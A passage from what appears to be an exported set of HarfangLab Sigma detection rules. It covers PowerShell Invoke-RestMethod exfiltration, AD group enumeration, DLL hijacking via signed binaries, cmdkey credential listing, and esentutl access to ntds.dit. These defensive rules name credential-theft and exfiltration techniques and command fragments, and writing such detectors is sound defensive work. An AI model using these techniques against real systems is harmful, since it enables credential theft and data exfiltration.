?:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb'\n\n exclusion_arcserve_backup:\n ParentImage: '?:\\Program Files\\CA\\SharedComponents\\ARCserve Backup\\UniAgent\\caagstart.exe'\n # C:\\Windows\\system32\\esentutl /K \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy89\\Windows\\NTDS\\edb06C20.log\n # C:\\Windows\\system32\\esentutl /K \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy103\\Windows\\NTDS\\ntds.dit\n CommandLine:\n - '?:\\Windows\\system32\\esentutl /K *\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\NTDS\\edb*.log'\n - '?:\\Windows\\system32\\esentutl /K *\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\NTDS\\ntds.dit'\n\n # Microsoft File Replication Service\n exclusion_ntrfs:\n ParentImage: '?:\\Windows\\System32\\ntfrs.exe'\n CommandLine: 'esentutl /d ?:\\windows\\ntfrs\\jet\\ntfrs.jdb'\n\n exclusion_edblog:\n CommandLine:\n - '?:\\Windows\\system32\\esentutl.exe /? edb.log'\n - '?:\\Windows\\system32\\esentutl.exe /?? edb.log'\n\n exclusion_veritas_backup:\n ParentImage: '?:\\Program Files\\Veritas\\Backup Exec\\raws\\beremote.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "11f7107e-28d1-4486-afca-4379b68744b3",
"rule_name": "Esentutl.exe Execution",
"rule_description": "Detects the execution of esentutl.exe, a legitimate Windows database utility.\nAdversaries may misuse this tool to manipulate files, access sensitive data, or disable security measures.\nIt is recommended to investigate the legitimacy of the esentutl.exe execution and review file accesses.\n",
"rule_creation_date": "2021-07-09",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218",
"attack.t1564.004",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12043ba4-4c8f-42df-8036-1677ede6fb84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623724Z",
"creation_date": "2026-03-23T11:45:34.623727Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623731Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf",
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.5",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1059_001_data_exfiltration_invoke_restmethod.yml",
"content": "title: Data Exfiltration via Invoke-RestMethod\nid: 12043ba4-4c8f-42df-8036-1677ede6fb84\ndescription: |\n Detects attempts to exfiltrate data via PowerShell using the Invoke-RestMethod cmdlet with an HTTP POST to an external server.\n Attackers can use this command to exfiltrate sensitive data, as was observed in the attack against the energy sector in Poland in 2025.\n It is recommended to investigate the context surrounding this command and verify the legitimacy of the remote server involved in the request.\nreferences:\n - https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf\n - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.5\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2026/01/30\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'Invoke-RestMethod '\n - ' -Ur' # -Uri\n - ' -Me' # -Method\n - ' -I' # -InFile\n - ' POST'\n ScriptNumberOfLines: 1\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12043ba4-4c8f-42df-8036-1677ede6fb84",
"rule_name": "Data Exfiltration via Invoke-RestMethod",
"rule_description": "Detects attempts to exfiltrate data via PowerShell using the Invoke-RestMethod cmdlet with an HTTP POST to an external server.\nAttackers can use this command to exfiltrate sensitive data, as was observed in the attack against the energy sector in Poland in 2025.\nIt is recommended to investigate the context surrounding this command and verify the legitimacy of the remote server involved in the request.\n",
"rule_creation_date": "2026-01-30",
"rule_modified_date": "2026-03-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12345a32-eabd-4124-ad05-d724d29e4fd1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083577Z",
"creation_date": "2026-03-23T11:45:34.083580Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083584Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814",
"https://blog.talosintelligence.com/emerging-interlock-ransomware/",
"https://attack.mitre.org/techniques/T1069/002/"
],
"name": "t1069_002_domain_group_discovered_powershell.yml",
"content": "title: Domain Group Discovered via PowerShell\nid: 12345a32-eabd-4124-ad05-d724d29e4fd1\ndescription: |\n Detects the use of PowerShell to enumerate Active Directory groups.\n This may indicate reconnaissance activity aimed at identifying privileged, sensitive, or role-based groups.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2025/07/09\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[adsisearcher]'\n - 'objectCategory=group'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12345a32-eabd-4124-ad05-d724d29e4fd1",
"rule_name": "Domain Group Discovered via PowerShell",
"rule_description": "Detects the use of PowerShell to enumerate Active Directory groups.\nThis may indicate reconnaissance activity aimed at identifying privileged, sensitive, or role-based groups.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2025-07-09",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12abc941-fc36-4c0f-97cf-0f380e889982",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099100Z",
"creation_date": "2026-03-23T11:45:34.099102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_setup.yml",
"content": "title: DLL Hijacking via Setup.exe\nid: 12abc941-fc36-4c0f-97cf-0f380e889982\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio Setup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Setup.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\dlmgr.dll'\n filter_legitimate_image:\n - Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - 
'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12abc941-fc36-4c0f-97cf-0f380e889982",
"rule_name": "DLL Hijacking via Setup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Visual Studio Setup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12d65b1e-e1ac-4617-86a9-eda02d5297ad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094687Z",
"creation_date": "2026-03-23T11:45:34.094689Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094693Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_groups_macos.yml",
"content": "title: Groups Listed via Groups\nid: 12d65b1e-e1ac-4617-86a9-eda02d5297ad\ndescription: |\n Detects the execution of the groups command.\n Attackers may use it during the discovery phase of an attack to enumerate the groups which a user belongs to.\n It is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/groups'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_common_folder:\n - ProcessGrandparentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n - ProcessParentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12d65b1e-e1ac-4617-86a9-eda02d5297ad",
"rule_name": "Groups Listed via Groups",
"rule_description": "Detects the execution of the groups command.\nAttackers may use it during the discovery phase of an attack to enumerate the groups which a user belongs to.\nIt is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "12fbe22c-6804-46a4-9668-d8c5dca77830",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605747Z",
"creation_date": "2026-03-23T11:45:34.605750Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605757Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/",
"https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/",
"https://attack.mitre.org/techniques/T1087/",
"https://attack.mitre.org/techniques/T1078/",
"https://attack.mitre.org/techniques/T1552/"
],
"name": "t1087_account_credentials_cmdkey.yml",
"content": "title: Account Credentials Discovered via cmdkey.exe\nid: 12fbe22c-6804-46a4-9668-d8c5dca77830\ndescription: |\n Detects the execution of cmdkey.\n Attackers can use cmdkey to list system cached credentials, which can potentially be used for privilege escalation.\n Cmdkey can also be used to add or delete credentials to/from the cache.\n It is recommended to investigate the parent process for other suspicious actions.\nreferences:\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n - https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/\n - https://attack.mitre.org/techniques/T1087/\n - https://attack.mitre.org/techniques/T1078/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2022/12/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1552\n - attack.discovery\n - attack.t1087\n - attack.initial_access\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Cmdkey\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\cmdkey.exe'\n - OriginalFileName: 'cmdkey.exe'\n\n selection_cmdline:\n CommandLine|contains:\n - '/list'\n - '-list'\n\n exclusion_fiducial:\n ParentImage|endswith: '\\fermage.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "12fbe22c-6804-46a4-9668-d8c5dca77830",
"rule_name": "Account Credentials Discovered via cmdkey.exe",
"rule_description": "Detects the execution of cmdkey.\nAttackers can use cmdkey to list system cached credentials, which can potentially be used for privilege escalation.\nCmdkey can also be used to add or delete credentials to/from the cache.\nIt is recommended to investigate the parent process for other suspicious actions.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.initial_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1087",
"attack.t1552"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "13135882-44de-4952-9602-946619060e2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591331Z",
"creation_date": "2026-03-23T11:45:34.591334Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591341Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_eduprintprov.yml",
"content": "title: DLL Hijacking via eduprintprov.exe\nid: 13135882-44de-4952-9602-946619060e2e\ndescription: |\n Detects potential Windows DLL Hijacking via eduprintprov.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'eduprintprov.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\deviceassociation.dll'\n - '\\policymanager.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "13135882-44de-4952-9602-946619060e2e",
"rule_name": "DLL Hijacking via eduprintprov.exe",
"rule_description": "Detects potential Windows DLL Hijacking via eduprintprov.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1326ca37-dc76-44d4-8db5-d101df291be4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089206Z",
"creation_date": "2026-03-23T11:45:34.089208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mcbuilder.yml",
"content": "title: DLL Hijacking via mcbuilder.exe\nid: 1326ca37-dc76-44d4-8db5-d101df291be4\ndescription: |\n Detects potential Windows DLL Hijacking via mcbuilder.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mcbuilder.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcp47mrm.dll'\n - '\\mrmcoreR.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1326ca37-dc76-44d4-8db5-d101df291be4",
"rule_name": "DLL Hijacking via mcbuilder.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mcbuilder.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "13384352-88eb-420b-a83a-24445d5a52c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095469Z",
"creation_date": "2026-03-23T11:45:34.095471Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095475Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_shtinkering.yml",
